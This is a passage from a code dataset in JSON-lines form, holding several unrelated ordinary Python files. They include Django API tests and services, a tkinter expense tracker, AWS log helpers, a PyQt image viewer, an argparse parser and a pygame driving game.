stream = Stream(auth, l)\n stream.filter(track=['basketball', 'GSOPAO', '#GSOPAO', 'panathinaikos'])","sub_path":"to_find_out_tweets_format.py","file_name":"to_find_out_tweets_format.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"160793786","text":"import pytest\n\nfrom django.urls import reverse\nfrom rest_framework import status\n\n# mark the whole module for db use\nfrom core.test_utils import LeelooTestCase\n\npytestmark = pytest.mark.django_db\n\n\nmetadata_view_names = (\n 'business-type',\n 'country',\n 'employee-range',\n 'interaction-type',\n 'sector',\n 'service',\n 'role',\n 'title',\n 'turnover',\n 'uk-region'\n)\n\nmetadata_views_ids = (\n 'business types view',\n 'countries view',\n 'employee ranges view',\n 'interaction types view',\n 'sector view',\n 'service view',\n 'roles view',\n 'titles view',\n 'turnover view',\n 'UK regions view'\n)\n\n\n@pytest.mark.parametrize('view_name',\n metadata_view_names,\n ids=metadata_views_ids)\ndef test_metadata_view_get(view_name, api_client):\n \"\"\"Test a metadata view for 200 only.\"\"\"\n\n url = reverse(viewname=view_name)\n response = api_client.get(url)\n\n assert response.status_code == status.HTTP_200_OK\n\n\n@pytest.mark.parametrize('view_name',\n metadata_view_names,\n ids=metadata_views_ids)\ndef test_metadata_view_post(view_name, api_client):\n \"\"\"Test views are read only.\"\"\"\n\n url = reverse(viewname=view_name)\n response = api_client.post(url)\n assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED\n\n\n@pytest.mark.parametrize('view_name',\n metadata_view_names,\n ids=metadata_views_ids)\ndef test_metadata_view_put(view_name, api_client):\n \"\"\"Test views are read only.\"\"\"\n\n url = reverse(viewname=view_name)\n response = 
api_client.put(url)\n\n assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED\n\n\n@pytest.mark.parametrize('view_name',\n metadata_view_names,\n ids=metadata_views_ids)\ndef test_metadata_view_patch(view_name, api_client):\n \"\"\"Test views are read only.\"\"\"\n\n url = reverse(viewname=view_name)\n response = api_client.patch(url)\n\n assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED\n","sub_path":"leeloo/company/test/test_metadata_views.py","file_name":"test_metadata_views.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"133183747","text":"# GUI-การบ้าน.py\r\n\r\n\"\"\"การบ้าน\r\n-------\r\nสร้างช่องกรอกจำนวน แล้วคำนวณค่า total แล้วบันทึกเป็นข้อมูล\r\ndata = [‘น้ำเต้าหู้’,20,3,60]\r\ndata = [ชื่อรายการ, ราคา, จำนวน, รวมทั้งหมด]\r\n\r\nextra: ถ้าทำได้ให้บันทึกเวลาตอนเซฟด้วย\r\nคำใบ้: \r\nfrom datetime import datetime\r\ndt = datetime.now()\r\n\"\"\"\r\n\r\n\r\nfrom tkinter import *\r\nfrom tkinter.ttk import Notebook\r\nfrom tkinter import ttk, messagebox\r\nfrom datetime import datetime\r\nimport csv\r\n\r\n\r\nGUI = Tk()\r\nGUI.title('Program บันทึกค่าใช��จ่าย by SJ')\r\nGUI.geometry('600x620+500+50') #แนวแกน X,Y จากมุมซ้ายบน\r\n#B1 = Button(GUI,text='Hello')\r\n#B1.pack(ipadx=50,ipady=20) # ติดปุ่มเข้าไปกับ GUI หลัก(internal padding ความใหญ่pixel)\r\nFONT1 = ('Gadugi',18,) #เปลี่ยนFont 'Angsana New'\r\nFONT2 = ('Times New Roman',10,'bold')\r\n\r\n######### Menubar #####################\r\nmenubar = Menu(GUI)\r\nGUI.config(menu=menubar)\r\n\r\n#File menu\r\nfilemenu = Menu(menubar,tearoff=0)\r\nmenubar.add_cascade(label='File',menu=filemenu)\r\nfilemenu.add_command(label='inport CSV')\r\nfilemenu.add_command(label='Export to googlesheet')\r\n\r\ndef About():\r\n\tmessagebox.showinfo('About', 'สวัสดีครับ\\n สวัสดี')\r\n#Help\r\nhelpmenu = Menu(menubar,tearoff=0)\r\nmenubar.add_cascade(label='Help',menu=helpmenu)\r\nhelpmenu.add_command(label='About',command=About)\r\n\r\n\r\n\r\n#Donate\r\ndonatemenu = Menu(menubar,tearoff=0)\r\nmenubar.add_cascade(label='Donate',menu=donatemenu)\r\n\r\n\r\n##############################\r\n\r\n\r\nTab = ttk.Notebook(GUI)\r\nT1 = ttk.Frame(Tab)\r\nT2 = ttk.Frame(Tab)\r\n\r\nexpenseicon = PhotoImage(file='expense.png').subsample(14)\r\nlisticon = PhotoImage(file='list.png').subsample(6)\r\nTab.pack(fill= BOTH ,expand=1)\r\n\r\nTab.add(T1, text=f'{\"Add Expense\":^{20}}',image=expenseicon,compound='top')\r\nTab.add(T2, text=f'{\"Expense List\": ^20s}',image=listicon,compound='top')\r\n\r\nF1=Frame(T1)\r\nF1.pack()\r\n\r\nF2=Frame(T2)\r\nF2.pack()\r\n\r\n\r\n\r\n#Dictionary\r\ndays = {'Mon':'จันทร์',\r\n\t\t'Tue':'อังคาร',\r\n\t\t'Wed':'พุธ',\r\n\t\t'Thu':'พฤหัสบดี',\r\n\t\t'Fri':'ศุกร์',\r\n\t\t'Sat':'เสาร์',\r\n\t\t'Sun':'อาทิตย์'}\r\n\r\n\r\n\r\ndef Save(event=None):\r\n\texpense = v_expense.get() #ดึงค่ามาจาก v_expense = StringVar()\r\n\tprice = v_price.get()\r\n\tamount = v_amount.get()\r\n\r\n\tif expense == '':\r\n\t\tprint('No Data')\r\n\t\tmessagebox.showinfo('Error','กรุณากรอกข้อมูลให้ครบ')\r\n\t\treturn\r\n\telif price =='':\r\n\t\tprint('No Data')\r\n\t\tmessagebox.showinfo('Error','กรุณากรอกราคา')\r\n\t\treturn\r\n\telif amount =='':\r\n\t\tamount = 1\r\n\t\t#print('No Data')\r\n\t\t#messagebox.showinfo('Error','กรุณากรอกจำนวน')\r\n\t\t#return\t\r\n\r\n\ttotal = float(price)*float(amount)\r\n\ttry:\r\n\t\ttotal = float(price)*float(amount)\r\n\t\ttoday = datetime.now().strftime('%a') #days=['Mon'] = 
'จันทร์'\r\n\t\tprint(today)\r\n\t\tstamp = datetime.now()\r\n\t\tdt1 = stamp.strftime('%Y-%m-%d %H:%M:%S')\r\n\t\ttranscationid= stamp.strftime('%Y%m%d%H%M%f')\r\n\r\n\t\tdt1 = days[today] + '-' + dt1\r\n\t\tprint('รายการ: {} ราคา: {} จำนวน: {} รวมมูลค่า: {} วัน: {} '.format(expense,price,amount,total,dt1))\r\n\t\t#textshow = 'รายการ: {} บาท/รายการ\\n จำนวน: {} รายการ\\n รวมมูลค่า: {} บาท\\n เวลา: {} '.format(expense,price,amount,total,dt)\r\n\t\t#messagebox.showinfo('บันทึกค่าใช้จ่าย',textshow)\r\n\t\ttext = 'รายการ: {}\\n ราคา: {}\\n'.format(expense,price)\r\n\t\ttext = text + 'จำนวน: {}\\n รวมมูลค่า: {}\\n วัน: {}\\n '.format(amount,total,dt1)\r\n\t\tv_result.set(text)\r\n\r\n\t\t\t\t \r\n\t\t#Clear ข้อมูลเก่า\r\n\t\tv_expense.set('')\r\n\t\tv_price.set('')\r\n\t\tv_amount.set('')\r\n\t\t\r\n\t\t#บันทึกข้อมูลลง CSV อย่างลืม Import ลง CSV ด้วย\r\n\t\twith open('savedata.csv','a',encoding='UTF-8',newline='') as f:\r\n\t\t\t#with เปิดไฟล์แล้วปิดอัตโนมัติ\r\n\t\t\t# 'a' การบันทึกเพิ่มข้อมูลไปเรื่อยๆต่อจากข้อมูลเก่า (แต่ 'w' เขียนใหม่ทั้งหมด)\r\n\t\t\t# newline='' ทำให้ข้อมูลไม่มีบรรทัดว่าง \r\n\t\t\tfw = csv.writer(f) #สร้างฟังก์ชันสำหรับเขียนข้อมูล\r\n\t\t\tdata = [transcationid,dt1,expense,price,amount,total]\r\n\t\t\tfw.writerow(data)\r\n\t\t\r\n\t\t\t\r\n\r\n\t\tE1.focus()#ทำให้ Curser กลับไปตำแหน่งช่องกรอก E1\r\n\t\tupdate_table()\r\n\texcept Exception as e:\r\n\r\n\t\tprint('ERROR',e)\r\n\t\t#messagebox.showerror('Error','กรุณากรอกข้อมูลใหม่ กรอกเฉพาะตัวเลข')\r\n\t\tmessagebox.showwarning('Error','กรุณากรอกข้อมูลใหม่ กรอกเฉพาะตัวเลข')\r\n\t\t#messagebox.showinfo('Error','กรุณากรอกข้อมูล���หม่ กรอกเฉพาะตัวเลข')\r\n\r\n\t\tv_expense.set('') #Clear ข้อมูลเก่า\r\n\t\tv_price.set('')\r\n\t\tv_amount.set('')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# ทำให้สามารถกด enter ได้\r\nGUI.bind('',Save) #ต้องเพิ่มใน def Save(event=None) ด้วย\r\n\r\n#--------Background 1------------\r\nbg = PhotoImage(file='account.png').subsample(1)\r\nacpic = ttk.Label(F1, image=bg)\r\nacpic.pack(pady=1)\r\n\r\n\r\n#-----text1-------\r\nL = ttk.Label(F1,text='รายการค่าใช้จ่าย', font=FONT1).pack()\r\nv_expense = StringVar() #StringVar() คือ ตัวแปรพิเศษสำหรับเก็บข้อมูลใน GUI\r\n\r\nE1 = ttk.Entry(F1,textvariable=v_expense,font=FONT1,)\r\nE1.pack()\r\n\r\n#-----text2-------\r\nL = ttk.Label(F1,text='ราคา(บาท)', font=FONT1).pack()\r\nv_price = StringVar() \r\n\r\nE2 = ttk.Entry(F1,textvariable=v_price,font=FONT1)\r\nE2.pack()\r\n\r\n#-----text3-------\r\nL = ttk.Label(F1,text='จำนวน', font=FONT1).pack()\r\nv_amount = StringVar() \r\n\r\nE3 = ttk.Entry(F1,textvariable=v_amount,font=FONT1)\r\nE3.pack()\r\n\r\n\r\n\r\nsaveicon = PhotoImage(file='save.png').subsample(8)\r\nB2 = ttk.Button(F1,image=saveicon,text=f'{\"SAVE\":^{10}}',command=Save,compound='top')\r\nB2.pack(ipadx=20,ipady=10,pady=10) #ติดปุ่มเข้าไปกับ GUI (ใช้ ipadไม่ได้)\r\n\r\n\r\nv_result =StringVar()\r\nv_result.set('-------ผลลัพธ์-------')\r\nresult = ttk.Label(F1,textvariable=v_result,font=FONT2,foreground='blue')\r\nresult.pack(pady=10)\r\n\r\n\r\n############### Tab 2 ###############\r\n# rs=[]\r\n\r\ndef read_csv():\r\n\t# global rs\r\n\twith open('savedata.csv',newline='',encoding='utf-8') as f:\r\n\t\tfr = csv.reader(f)\r\n\t\tdata = list(fr)\r\n\t\t# rs = data\r\n\t\t# print(rs)\r\n\treturn data\r\n# print(data)\r\n\t\t# print('--------')\r\n\t\t# print(data[0][0])\r\n\t\t# for a,b,c,d,e in data:\r\n\t\t# \tprint(b)\r\n\r\n# rs = read_csv()\r\n# print(rs[0]) \r\n\r\n#table\r\nL = ttk.Label(T2,text='ตารางแสดงผลลัพธ์ทั้งหมด', 
font=FONT1).pack(pady=5)\r\nheader = ['รหัสรายการ','วัน-เวลา','รายการ','ราคา','จำนวน','รวมยอด']\r\nresulttable = ttk.Treeview(T2, columns=header,show='headings',heigh=15)\r\nresulttable.pack(pady=20)\r\n\r\n# for i in range(len(header)):\r\n# \tresulttable.heading(header[i],text=header[i])\r\n\r\nfor h in header:\r\n\tresulttable.heading(h,text=h)\r\n\r\nheaderwidth = [120,150,100,50,50,50]\r\nfor h,w in zip(header,headerwidth):\r\n\tresulttable.column(h,width=w)\r\n\r\n\r\nalltransaction = {}\r\n\r\ndef UpdateCSV():\r\n\twith open('savedata.csv','w',newline='',encoding='utf-8') as f:\r\n\t\tfw = csv.writer(f)\r\n\t\t#เตรียมข้อมูลให้กลายเป็น list\r\n\t\tdata = list(alltransaction.values())\r\n\t\tfw.writerows(data) # multipleline nested list [[],[],[]]\r\n\t\tprint('Table was updated')\r\n\t\t\r\n\r\n# resulttable.insert('','end',value=[1,2,3,4,5])\r\ndef DeleteRecord(event=None):\r\n\tcheck = messagebox.askyesno('Confirm?','คุณต้องการลบข้อมูลใช่หรือไม่')\r\n\tprint('Yes/No',check)\r\n\tif check == True:\r\n\t\tprint('delete')\r\n\t\tselect = resulttable.selection()\r\n\t\t#print(select)\r\n\t\tdata = resulttable.item(select)\r\n\t\tdata = data['values']\r\n\t\ttranscationid = data[0]\r\n\t\t#print(transcationid)\r\n\t\tdel alltransaction[str(transcationid)] #delete data in dictalltransaction = {}\r\n\t\t#print(alltransaction)\r\n\t\tUpdateCSV()\r\n\t\tupdate_table()\r\n\telse:\r\n\t\tprint('cancle')\r\nBDelete = ttk.Button(T2,text='delete',command=DeleteRecord)\r\nBDelete.place(x=50,y=450)\r\n\r\nresulttable.bind('',DeleteRecord)\r\n\r\n\r\n\r\ndef update_table():\r\n\tresulttable.delete(*resulttable.get_children()) #เคลียข้อมูลชุดเก่าก่อน\r\n\ttry:\r\n\t\tdata = read_csv()\r\n\t\tfor d in data:\r\n\t\t\t#create transcation data\r\n\t\t\talltransaction[d[0]] = d #d[0] =transactionid\r\n\t\t\tresulttable.insert('',0,value=d)\r\n\t\t#print(alltransaction)\r\n\texcept Exception as e:\r\n\t\tprint('No file')\r\n\t\tprint('ERROR:',e)\r\n\t# print(data)\r\n\r\n\r\n\r\n\r\n\r\n\r\n####Right Click Menu#######\r\n'''\r\nrightclick = menu(GUI,tearoff=0)\r\nrightclick.add_command(label='Edit')\r\nrightclick.add_command(label='Delete')\r\n\r\n\r\ndef menupopup(event):\r\n\t#print(event.x_root, event.y_root)\r\n\trightclick.post(event.x_root,event.y_root)\r\n\r\nresulttable.bind('',menupopup) #ถ้าเปลี่ยนเป็น GUI.bind จะclickขวาตรงไหนก็ขึ้น\r\n'''\r\n\r\nupdate_table()\r\nprint('GET CHILD:',resulttable.get_children())\r\nGUI.bind('',lambda x: E2.focus()) #ดูว่ามีการกดปุ่ม enter หรื���เปล่า ถ้ามีก็เหมือนรัน Save จึงต้องต้องเพิ่มใน def Save(event=None) ด้วย \r\nGUI.mainloop()\r\n#เป็นการ Run ตลอดเวลา GUI สมบูรณ์ เช็คตลอดว่ามีใครกดปุ่มอะไรหรือยัง\r\n","sub_path":"GUI Expense.py","file_name":"GUI Expense.py","file_ext":"py","file_size_in_byte":10569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"400413707","text":"from resources import resource_interface as interface\n\nclass LogStream(interface.InterfaceResource):\n def __init__(self, cloud_watch_logs, resource_names):\n self.cloud_watch_logs = cloud_watch_logs\n self.resource_names = resource_names\n\n def is_resource_created(self) -> bool:\n response = self.cloud_watch_logs.describe_log_streams(\n logGroupName=self.resource_names.get_log_group_name(),\n logStreamNamePrefix=self.resource_names.get_log_stream_name()\n )\n \n if response['logStreams']:\n return True\n\n return False\n\n def create_resource(self) -> None:\n self.cloud_watch_logs.create_log_stream(\n 
logGroupName=self.resource_names.get_log_group_name(),\n logStreamName=self.resource_names.get_log_stream_name()\n )\n \n return\n ","sub_path":"resources/resource_log_stream.py","file_name":"resource_log_stream.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278411666","text":"from base64 import b64encode\r\nimport json\r\n\r\nfrom django.core.files.base import ContentFile\r\nfrom django.http import HttpResponse\r\nfrom django.http import JsonResponse\r\nfrom django.template.loader import render_to_string\r\nfrom wsgiref.util import FileWrapper\r\n\r\nimport django_rq\r\nimport requests\r\n\r\nfrom .models import Check, Printer\r\nfrom .worker import create_pdf\r\n\r\n\r\nclass PrinterApiService:\r\n @staticmethod\r\n def create_checks(order):\r\n \"\"\"\r\n Создает чеки для всех принтеров точки указанной в заказе и \r\n ставит ассинхронные задачи на генерацию pdf файлов для этих чеков.\r\n\r\n Args:\r\n order (str): String with json content describing an order\r\n\r\n Returns: \r\n JsonResponse\r\n \"\"\"\r\n try:\r\n order = json.loads(order)\r\n except:\r\n raise TypeError(\"Invalid json in order field\")\r\n \r\n printers = Printer.objects.filter(point_id=order['point_id'])\r\n if not printers:\r\n return JsonResponse({\"error\": \"Для данной точки не настроено ни одного принтера\"}, status=400)\r\n\r\n checks = Check.objects.filter(printer_id__in=printers.values('pk'), order=order)\r\n printers = printers.exclude(pk__in=checks.values('printer_id__pk'))\r\n\r\n if checks and not printers:\r\n return JsonResponse({\"error\": \"Для данного заказа уже созданы чеки\"}, status=400)\r\n\r\n if printers: \r\n new_checks = []\r\n for printer in printers:\r\n new_checks.append(Check(printer_id=printer, type=printer.check_type, order=order))\r\n\r\n created_checks = Check.objects.bulk_create(new_checks)\r\n\r\n for check in created_checks:\r\n django_rq.enqueue(create_pdf, check_id=check.id)\r\n \r\n if created_checks:\r\n return JsonResponse({\"ok\": \"Чеки успешно созданы\"}, status=200)\r\n \r\n return JsonResponse({\"error\": \"Something went wrong\"}, status=500)\r\n\r\n @staticmethod\r\n def get_rendered_checks(api_key):\r\n \"\"\"\r\n Возвращает список чеков доступных для печати.\r\n \r\n Args:\r\n api_key (str): Printer's api_key\r\n\r\n Returns:\r\n JsonResponse\r\n \"\"\"\r\n printers = Printer.objects.filter(api_key=api_key)\r\n if printers:\r\n checks_ids = Check.objects.filter(\r\n printer_id__in=printers.values('id'), \r\n status='rendered'\r\n ).exclude(pdf_file='').values('id')\r\n return JsonResponse({'checks': list(checks_ids)}, status=200)\r\n\r\n return JsonResponse({\"error\": \"Ошибка авторизации\"}, status=401)\r\n \r\n @staticmethod\r\n def get_pdf_check(api_key, check_id):\r\n \"\"\"\r\n Возвращает pdf файл чека.\r\n\r\n Args:\r\n api_key (str): Printer's api_key\r\n check_id (int): Check's id\r\n \r\n Returns: \r\n HttpResponse (application/pdf): If file exists\r\n JsonResponse: otherwise\r\n \"\"\"\r\n printers = Printer.objects.filter(api_key=api_key)\r\n \r\n if printers:\r\n try:\r\n check = Check.objects.get(printer_id__in=printers.values('id'), pk=check_id)\r\n if check.pdf_file:\r\n pdf_file = open(check.pdf_file.path, 'rb')\r\n response = HttpResponse(FileWrapper(pdf_file), content_type='application/pdf')\r\n response['Content-Disposition'] = 'attachment; filename=\"%s\"' % check.pdf_file.name\r\n return response\r\n else:\r\n return JsonResponse({'error': \"Для 
данного чека не сгенерирован PDF-файл\"}, status=400)\r\n except Check.DoesNotExist:\r\n return JsonResponse({'error': \"Данного чека не существует\"}, status=400)\r\n\r\n return JsonResponse({\"error\": \"Ошибка авторизации\"}, status=401)\r\n","sub_path":"printer_api/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"532268389","text":"\"\"\"These functions mainly help with finding a worksheet's header row.\"\"\"\n\n# --- Standard Library Imports ------------------------------------------------\nfrom difflib import SequenceMatcher\nimport statistics\n\n# --- Third Party Imports -----------------------------------------------------\n# None\n\n# --- Intra-Package Imports ---------------------------------------------------\nfrom excelerator.main import excel_interface\n\n\n# --- HEADERS -----------------------------------------------------------------\n\ndef get_best_match_row_number(worksheet, values, max_row=20):\n \"\"\"Find the row that best matches a set of values.\n :param worksheet: openpyxl Worksheet object\n :param values: collection of row values you expect to find.\n :param max_row: function searches rows from 1 to max_row\n :return: row number (1-indexed) that best matches the provided values\n \"\"\"\n last_row = min(max_row, worksheet.max_row)\n rows = [excel_interface.get_worksheet_row(worksheet, row) for row in range(1, last_row + 1)]\n best_index = find_most_similar_string_sequence(values, rows)\n return best_index + 1\n\n\n# --- STRING ANALYSIS ---------------------------------------------------------\n\ndef best_similarity_ratio(value: str, strings: list): #, return_ratio=False):\n \"\"\"Return the best match to a given string.\"\"\"\n string = str(value)\n # if len(strings) == 0:\n # if return_ratio:\n # return 0\n # else:\n # return None\n ratios = [\n SequenceMatcher(None, string, str(orig_string)).ratio()\n for orig_string in strings\n ]\n max_ratio = max(ratios)\n # if return_ratio:\n # return max_ratio\n # else:\n # index = ratios.index(max_ratio)\n # return strings[index]\n return max_ratio\n\n\n# def map_one_string_to_another(expected_strings: set, actual_strings: set):\n# \"\"\"\n# Maps field names to their exact or best matches in pandas dataframe.\n# :param expected_strings: strings for whom we seek the best match\n# :param actual_strings: available strings\n# :return: dict[expected_string] = actual_string\n# \"\"\"\n#\n# # --- Setup ---------------------------------------------------------------\n# result = {}\n#\n# # --- Get exact matches ---------------------------------------------------\n# for string in expected_strings & actual_strings:\n# result[string] = string\n# remaining_expected = list(expected_strings - actual_strings)\n# remaining_actual = list(actual_strings - expected_strings)\n#\n# # --- Order expected strings by best match --------------------------------\n# def sort_by_match_ratio_then_alphbetical(input_string):\n# ratio = find_most_similar_string(\n# value=input_string,\n# strings=list(remaining_expected),\n# return_ratio=True,\n# )\n# return ratio, input_string\n# remaining_expected.sort(key=sort_by_match_ratio_then_alphbetical)\n#\n# # --- Find best match for each remaining string ---------------------------\n# for string in remaining_expected:\n# best_actual = find_most_similar_string(string, remaining_actual)\n# result[string] = best_actual\n# if best_actual is not None:\n# 
remaining_actual.remove(best_actual)\n#\n# # --- Return result -------------------------------------------------------\n# return result\n\n\ndef similarity_between_two_strings(input_strings, output_strings):\n match_ratios = [best_similarity_ratio(string, output_strings) for string in input_strings]\n return statistics.mean(match_ratios)\n\n\ndef find_most_similar_string_sequence(expected_string_sequence, list_of_actual_string_sequences):\n similarity_ratios = [\n similarity_between_two_strings(expected_string_sequence, actual_sequence)\n for actual_sequence in list_of_actual_string_sequences\n ]\n best_ratio = max(similarity_ratios)\n best_index = similarity_ratios.index(best_ratio)\n return best_index\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"excelerator/main/headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"242330002","text":"#!/usr/lib/python\n\nimport BeautifulSoup\nimport urllib2\nimport sys\n\nif __name__ == \"__main__\":\n\tSEARCH_CRITERIA = { \"tweets\" : \"/pages/tweets\", \"following\" : \"/pages/friends\", \"followers\" : \"/pages/100\" }\n\n\tstd_timezone = \"Vienna\"\n\tstd_criteria = SEARCH_CRITERIA[\"tweets\"]\n\tstd_output_file = \"userlist.txt\"\n\n\tif len(sys.argv) == 4:\n\t\tcrit = sys.argv[1]\t\t\n\t\tif crit in SEARCH_CRITERIA:\n\t\t\tcriteria = SEARCH_CRITERIA[crit]\n\t\telse:\n\t\t\tcriteria = std_criteria\n\t\ttimezone = sys.argv[2]\n\t\toutput_file = sys.argv[3]\n\telse:\n\t\tcriteria = std_criteria\n\t\ttimezone = std_timezone\n\t\toutput_file = std_output_file\n\n\turl = \"http://twittercounter.com\" + criteria + \"?time_zone=\" + timezone\n\tcontent = urllib2.urlopen(url).read()\n\tsoup = BeautifulSoup.BeautifulSoup(content)\n\tuser_divs = soup.findAll(\"div\", attrs={\"class\" : \"clr\"})\n\n\tanchors = [u.a for u in user_divs]\n\n\twith open(output_file, \"w\") as f:\n\t\tfor anchor in anchors[1:]:\t\n\t\t\tf.write(anchor.get(\"href\")[1:] + \"\\n\")\n","sub_path":"TwitterUserLists/twitterusers.py","file_name":"twitterusers.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"457215370","text":"import re\n\ntext = 'ksdv vefer 2 asdv 23 vsdfv43vf 66 vf77'\n\naRegex = re.compile(r'\\d\\d')\nmo = aRegex.search(text)\nmo2 = aRegex.findall(text)\n\nprint(mo.group())\nprint(mo)\nprint(mo2)\n","sub_path":"re.py","file_name":"re.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"366909955","text":"import sys\nfrom PyQt4 import QtGui\nfrom PIL import Image\n\ndef get_pil_image(w, h):\n clr = chr(0)+chr(255)+chr(0)\n f = open(r\"C:\\Program Files\\WinDbg\\WinDbg(x86)\\2C1BC020image.txt\", \"r\")\n im = Image.frombytes(\"RGBA\", (w,h), f.read())\n return im\n\ndef pil2qpixmap(w, h):\n # w, h = pil_image.size\n # data = pil_image.tobytes(\"raw\", \"BGRX\")\n f = open(r\"C:\\Program Files\\WinDbg\\WinDbg(x86)\\2C1BC020image.txt\", \"r\")\n data = f.read()\n # print data\n qimage = QtGui.QImage(data, w, h, QtGui.QImage.Format_RGB32)\n # qpixmap = QtGui.QPixmap(w,h)\n pix = QtGui.QPixmap.fromImage(qimage)\n return pix\n\nclass ImageLabel(QtGui.QLabel):\n def __init__(self, parent=None):\n QtGui.QLabel.__init__(self, parent)\n\n self.setGeometry(300, 300, 1024, 1024)\n self.setWindowTitle('Window')\n\n f = open(r\"C:\\Program 
Files\\WinDbg\\WinDbg(x86)\\2C1BC020image.txt\", \"r\")\n data = f.read()\n f.close()\n self.data = data\n qimage = QtGui.QImage(data, 1024,1024, QtGui.QImage.Format_RGB32)\n self.pix = QtGui.QPixmap.fromImage(qimage)\n self.setPixmap(self.pix)\n\napp = QtGui.QApplication(sys.argv)\nimageLabel = ImageLabel()\nimageLabel.show()\nsys.exit(app.exec_())","sub_path":"learn_py/gc/showBitmap - 副本.py","file_name":"showBitmap - 副本.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"387737775","text":"\"\"\"Print the full configuration.\"\"\"\n\nimport ruamel.yaml\nimport re\nfrom . import DodoCommand\n\n\nclass Command(DodoCommand): # noqa\n def add_arguments_imp(self, parser): # noqa\n parser.add_argument('--key')\n\n def handle_imp(self, key, **kwargs): # noqa\n if key:\n print(\"%s\" % str(self.get_config(key, '')))\n else:\n content = re.sub(\n r'^([0-9_A-Z]+\\:)$',\n r'\\n\\1',\n ruamel.yaml.round_trip_dump(self.config),\n flags=re.MULTILINE\n )\n print(\n re.sub(\n r'^\\n\\n',\n r'\\n',\n content,\n flags=re.MULTILINE\n )\n )\n","sub_path":"dodo_commands/extra/standard_commands/print-config.py","file_name":"print-config.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"125588956","text":"import argparse\nimport yaml\n\n\nclass Parser:\n \"\"\"\n Used for parsing command line inputs.\n \"\"\"\n\n def __init__(self): # noqa: CFQ001\n \"\"\"\n Constructor method for specifying default values.\n \"\"\"\n self.parser_field = argparse.ArgumentParser(description='Generate synthetic data')\n self.parser_field.add_argument('-m', '--materials', nargs='+',\n help=\"a list of materials generated in an image\",\n default=[\"Aluminium\"])\n self.parser_field.add_argument('-p', '--proportions', nargs='+',\n help=\"a list of proportions for each material specified\",\n type=int, default=[100])\n self.parser_field.add_argument('-c', '--objects_per_image',\n help=\"number of objects per image\", type=int, default=1)\n self.parser_field.add_argument('-i', '--image_count',\n help=\"number of images generated\", type=int, default=1)\n self.parser_field.add_argument('-b', '--background', help=\"name of background image file\",\n default='random')\n self.parser_field.add_argument('-o', '--output_location',\n help=\"path to image directory\", default=\"images/\")\n self.parser_field.add_argument('-rc', '--reuse_crushes',\n help=\"use existing crushed models instead of creating them\")\n self.parser_field.add_argument('-oc', '--only_crush',\n help=\"only crush the models of the given material,\"\n \" don't render images\")\n self.parser_field.add_argument('-dc', '--dont_crush',\n help=\"don't crush the models\")\n\n def parse_args(self, args):\n \"\"\"\n Parse the arguments.\n :param args: list with arguments to be parsed.\n :return: list with parsed arguments.\n \"\"\"\n parsed_args = self.parser_field.parse_args(args)\n self.validate_parsed_args(parsed_args)\n return parsed_args\n\n def validate_parsed_args(self, parsed_args):\n \"\"\"\n Validate if parsed arguments are valid.\n :param parsed_args: list with parsed arguments.\n :return: none or error if not valid\n \"\"\"\n if len(parsed_args.materials) != len(parsed_args.proportions):\n raise OSError('material list and proportions list should be of same size')\n if sum(parsed_args.proportions) != 100:\n raise OSError('proportions list should add up to 100')\n\n def 
parse_long_term_configuration(self, name):\n \"\"\"\n Parse long term configurations from yaml file.\n :name: path to the file with configurations.\n :return: dictionary containing configurations.\n \"\"\"\n with open(str(name)) as configuration:\n data = yaml.load(configuration, Loader=yaml.Loader)\n return data\n","sub_path":"src/util/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"699729","text":"import pygame\nimport random\nimport time\npygame.init()\n\nwidth, height = 500, 700\nscreen = pygame.display.set_mode((width, height))\npygame.display.set_caption('GTA VI')\nFPS = pygame.time.Clock()\n\ncar_x, car_y = 137, 520\necar_x, ecar_y = 0, 0\nspeed = 8\nroad = pygame.image.load('road.png')\ngameover = pygame.image.load('gameover.png')\ncoin = pygame.image.load('coin.png')\ncnt_coin = pygame.image.load('cnt_coin.png')\n \nfont = pygame.font.SysFont('bookantiqua', 35)\n\nclass Car(pygame.sprite.Sprite):\n def __init__(self):\n self.image = pygame.image.load('car.png')\n self.surf = pygame.Surface((car_x, car_y))\n\n def move(self):\n global car_x, car_y, speed\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and car_x >= 22:\n car_x -= speed\n elif keys[pygame.K_RIGHT] and car_x <= 390:\n car_x += speed\n \n def draw(self):\n screen.blit(self.image, (car_x, car_y))\n \n\nclass Enemy_car(pygame.sprite.Sprite):\n def __init__(self):\n self.image = pygame.image.load('enemy_car.png')\n self.surf = pygame.Surface((90, 170))\n self.spawn = [[20, -200], [142, -200], [273, -200], [387, -200]]\n self.spawn_point = random.randint(0, 3)\n self.speedometer = [6, 9, 12, 14, 16]\n self.speed = random.randint(0, 4)\n def move(self):\n global ecar_x, ecar_y\n self.spawn[self.spawn_point][1] += self.speedometer[self.speed]\n if self.spawn[self.spawn_point][1] >= height + 